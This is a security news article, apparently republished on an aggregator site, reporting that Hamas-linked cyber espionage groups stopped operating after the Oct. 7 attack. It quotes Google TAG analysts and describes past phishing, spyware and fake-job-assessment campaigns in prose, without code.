Hamas Cyberattacks Ceased After the Oct. 7 Terror Attack. But Why?

  /     /     /  
Publicated : 23/11/2024   Category : security


Hamas Cyberattacks Ceased After the Oct. 7 Terror Attack. But Why?


Hamas-linked threat actors have defied norms, with no discernible uptick in cyber operations prior to the groups attack in Israel — and a complete abandonment of them thereafter.



Cyber threat actors linked with Hamas have seemingly ceased activity ever since the terrorist attack in Israel on Oct. 7, confounding experts.
Combination warfare is old hat in 2024. As Mandiant said
in a newly published report
, cyber operations have become a tool of first resort for any nation or nation-aligned group around the world engaged in protracted conflict, be it political, economic, or warlike in nature. Russias invasion of Ukraine — preceded and supported by historic waves of cyber destruction, espionage, and misinformation — is, of course, the quintessence.
Not so in Gaza. If todays playbook is to support resource-intensive kinetic war with low-risk, low-investment cyber war, Hamas has thrown out the book.
What we saw all through September 2023 was very typical Hamas-linked cyber espionage activities — their activity was very consistent with what weve seen for years, Kristen Dennesen, threat intelligence analyst for Googles Threat Analysis Group (TAG), said in a press conference this week. That activity continued on until just before October 7 — there wasnt any kind of shift or uptick prior to that point. And since that time, we havent seen any significant activity from these actors.
Failing to ramp up cyberattacks prior to Oct. 7 might be construed as strategic. But regarding why Hamas (
irrespective of its supporters
) has quit its cyber operations instead of using them to support its war effort, Dennesen admitted, We dont offer any explanation as to why because we dont know.
Typical Hamas-nexus cyberattacks include mass phishing campaigns to deliver malware or to steal email data, said Dennesen, as well as mobile spyware via various Android backdoors dropped via phishing. And finally, in terms of their targeting: very persistent targeting of Israel, of Palestine, their regional neighbors in the Middle East, as well as targeting of the US and Europe, she explained.
For a case study in what that looks like, take BLACKATOM — one of the three primary Hamas-linked threat actors, alongside BLACKSTEM (aka MOLERATS, Extreme Jackal) and DESERTVARNISH (aka UNC718, Renegade Jackal, Desert Falcons, Arid Viper).
In September, BLACKATOM began a social engineering campaign aimed at software engineers in the Israeli Defense Forces (IDF), as well as Israels defense and aerospace industries.
The ruse involved posing as employees of companies on LinkedIn and messaging targets with fake freelance job opportunities. After initial contact, the false recruiters would send a lure document with instructions for participating in a coding assessment.
The fake coding assessment required recipients to download a Visual Studio project, masquerading as a human resources management app, from an attacker-controlled GitHub or Google Drive page. Recipients were then asked to add features to the project, to demonstrate their coding skills. Contained within the project, though, was a function that secretly downloaded, extracted, and executed a malicious ZIP file on the affected computer. Inside the ZIP:
the SysJoker multiplatform backdoor
.
It may seem counterintuitive that Hamas invasion wouldnt have been paired with a shift in its cyber activity akin to Russias model. This may be due to its prioritization of operational security — the secrecy that made its Oct. 7 terror attack so shockingly effective.
Less explicable is why the most recent confirmed Hamas-related cyber activity, according to Mandiant, occurred back on Oct. 4. (Gaza, meanwhile, has suffered from significant Internet disruptions in recent months.)
I think the key thing to draw out is that these are very different conflicts, with very different entities involved, said Shane Huntley, senior director at Google TAG. Hamas is nothing like Russia. And therefore, its not surprising that the use of cyber is very different [depending on] the nature of the conflict, between standing armies versus a sort of attack like we saw on October 7.
But Hamas likely has not fully retired its cyber operations. While the outlook for future cyber operations by Hamas-linked actors is uncertain in the near term, we do anticipate that Hamas cyber activity will eventually resume. It should be focused on espionage for intelligence-gathering on these intra-Palestinian affairs, Israel, the United States, and other regional players in the Middle East, Dennesen noted.

Last News

▸ Beware EMV may not fully protect against skilled thieves. ◂
Discovered: 23/12/2024
Category: security

▸ Hack Your Hotel Room ◂
Discovered: 23/12/2024
Category: security

▸ Website hacks happened during World Cup final. ◂
Discovered: 23/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
Hamas Cyberattacks Ceased After the Oct. 7 Terror Attack. But Why?